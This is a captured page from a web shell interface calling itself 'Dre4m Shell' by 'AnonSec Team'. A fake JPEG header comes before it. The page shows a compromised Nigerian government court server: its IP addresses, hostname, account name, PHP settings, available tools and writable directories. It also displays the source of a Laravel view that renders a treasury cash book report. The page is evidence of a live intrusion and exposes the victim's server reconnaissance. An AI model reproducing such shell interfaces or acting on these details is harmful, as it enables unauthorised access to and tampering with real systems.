ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.147.61.5
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/19eb3b04a2c8af73a0dbfa9a98546dc70884a2bf.php
  <div align="center">
      <h4 class="text-success text-center"> <b>TREASURY CASH BOOK</b> </h4>
  </div>
  <br />
  <div class="row">
      <div align="center" class="col-md-4">
          <b>---------------------------------------------</b> <br />
          <small> <b>(Insert Department and Station)</b> </small>
      </div>
      <div align="center" class="col-md-3">
          <b>DATE .......... <?php echo e(strtoupper($getMonthAndYearFrom)); ?> ..........</b>
      </div>
      <div align="center" class="col-md-3">
          <b>DATE .......... <?php echo e(strtoupper($getMonthAndYearTo)); ?> ..........</b>
      </div>
      <div align="center" class="col-md-2">
          <b>TRY153A</b> 
      </div>
  </div>
  <br />
  <table class="table table-bordered table-condensed table-hover">
      <thead>
          <tr>
              <th>
                <div align="center"><b>Date</b></div>
              </th>
              <th>
                <div align="center"><b>No. of Voucher</b></div>
              </th>
              <th>
                <div align="center"><b>From Whom Received</b></div>
              </th>
              <th>
                <div align="center"><b>Description of Receipt</b></div>
              </th>
              <th>
                <div align="center"><b>NCOA</b></div>
              </th>
              <th>
                <div align="center"><b>No. of Treasury</b></div>
              </th>
              <th colspan="2">
                <div align="center"><b>TSA/BANK</b></div>
              </th>
              <th></th>
              <th>
                <div align="center"><b>Date</b></div>
              </th>
              <th>
                <div align="center"><b>No. of Voucher</b></div>
              </th>
              <th>
                <div align="center"><b>DVBN</b></div>
              </th>
              <th>
                <div align="center"><b>Beneficiary</b></div>
              </th>
              <th>
                <div align="center"><b>Description of Payment</b></div>
              </th>
              <th>
                <div align="center"><b>NCOA</b></div>
              </th>
              <th colspan="2">
                <div align="center"><b>TSA/BANK</b></div>
              </th>
          </tr>
      </thead>
      <tbody> 
        <?php if(count($allPaymentRefund) < count($allPaymentMadeByCPO)): ?>

        <?php if(count($allPaymentMadeByCPO) > 0): ?>
            <?php $countKey = 1; ?>
            <?php $__currentLoopData = $allPaymentMadeByCPO; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $paymentByCPO): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
            <tr>
              <?php if( $countKey <= count($allPaymentRefund) ): ?>
              <td><?php echo e($date[$countKey]); ?></td>
              <td><?php echo e($number_of_voucher[$countKey]); ?></td>
              <td><?php echo e($from_whom_received[$countKey]); ?></td>
              <td width="200"><?php echo e($des_of_receipt[$countKey]); ?></td>
              <td><?php echo e($economic_code_ncoa[$countKey]); ?></td>
              <td><?php echo e($number_of_treasury[$countKey]); ?></td>
              <td><?php echo e(number_format($amount_tsa_bank[$countKey], 2, '.', ',')); ?></td>
              <td width="30"></td>
              <?php else: ?>
               <td width="50"></td>
               <td width="50"></td>
               <td width="50"></td>
               <td width="50"></td>
               <td width="50"></td>
               <td width="50"></td>
               <td width="50"></td>
               <td width="30"></td>
              <?php endif; ?>
              <?php $countKey++; ?>
              <td width="10"></td>

              <td><?php echo e($paymentByCPO->date); ?></td>
              <td align="center"><?php echo e($paymentByCPO->transactionID); ?></td>
              <td width="80">&nbsp;</td>
              <td width="200">
                  <?php echo e($paymentByCPO->contractor); ?>

              </td>
              <td>
                  <?php echo e(substr($paymentByCPO->purpose , 0, 1000)); ?>

              </td>
              <td>
                  <?php echo e(' - '); ?>

              </td>
              <td><?php echo e(number_format($paymentByCPO->amount, 2, '.', ',')); ?></td>
              <td width="30"></td>
            </tr>
            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
        <?php else: ?>
            <tr>
            <td colspan="17">
              <div class="text-danger text-center">
                  <big><b> No record found for this selected date !</b></big>
              </div>
            </td>
          </tr>
        <?php endif; ?>
      <?php else: ?>
          <?php if(count($allPaymentRefund) > 0): ?>
              <?php $countCPOKey = 1; ?>
              <?php $__currentLoopData = $allPaymentRefund; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $listRefund): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                <tr>
                  <td width="50"> <?php echo e($listRefund->created_at); ?> </td>
                  <td width="50"> <?php echo e($listRefund->number_of_voucher); ?> </td>
                  <td width="50"> <?php echo e($listRefund->from_whom_received); ?> </td>
                  <td width="50"> <?php echo e($listRefund->des_of_receipt); ?> </td>
                  <td width="50"> <?php echo e($listRefund->economic_code_ncoa); ?> </td>
                  <td width="50"> <?php echo e($listRefund->number_of_treasury); ?> </td>
                  <td width="50"> <?php echo e(number_format($listRefund->amount_tsa_bank, 2, '.', ',')); ?> </td>
                  <td width="30"> </td>

                  <td width="10"></td>

                  <?php if( $countCPOKey <= count($allPaymentMadeByCPO) ): ?>
                  <td><?php echo e($dateCPO[$countCPOKey]); ?></td>
                  <td><?php echo e($transactionID[$countCPOKey]); ?></td>
                  <td><?php echo e($dVBN[$countCPOKey]); ?></td>
                  <td width="200"><?php echo e($payee[$countCPOKey]); ?></td>
                  <td><?php echo e($description[$countCPOKey]); ?></td>
                  <td><?php echo e($economicCode_NCOA[$countCPOKey]); ?></td>
                  <td><?php echo e(number_format($amount_CPO_bank[$countCPOKey], 2, '.', ',')); ?></td>
                  <td width="30"></td>
                  <?php else: ?>
                   <td width="50"></td>
                   <td width="50"></td>
                   <td width="50"></td>
                   <td width="50"></td>
                   <td width="50"></td>
                   <td width="50"></td>
                   <td width="50"></td>
                   <td width="30"></td>
                  <?php endif; ?>
                  <?php $countCPOKey++; ?>

                </tr>
              <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
          <?php else: ?>
          <tr>
            <td colspan="17">
              <div class="text-danger text-center">
                <b> No record found for this selected date !</b>
              </div>
            </td>
          </tr>
          <?php endif; ?>
      <?php endif; ?>
      </tbody>
  </table>

  <div align="center" class="hidden-print"><a href="<?php echo e(url('create-treasury-report')); ?>" class="btn btn-success hidden-print">Go Back</a> </div>
  <?php /**PATH C:\xampp\htdocs\nicngrp\resources\views/njcReconciliation/partial_report/viewAllReport.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team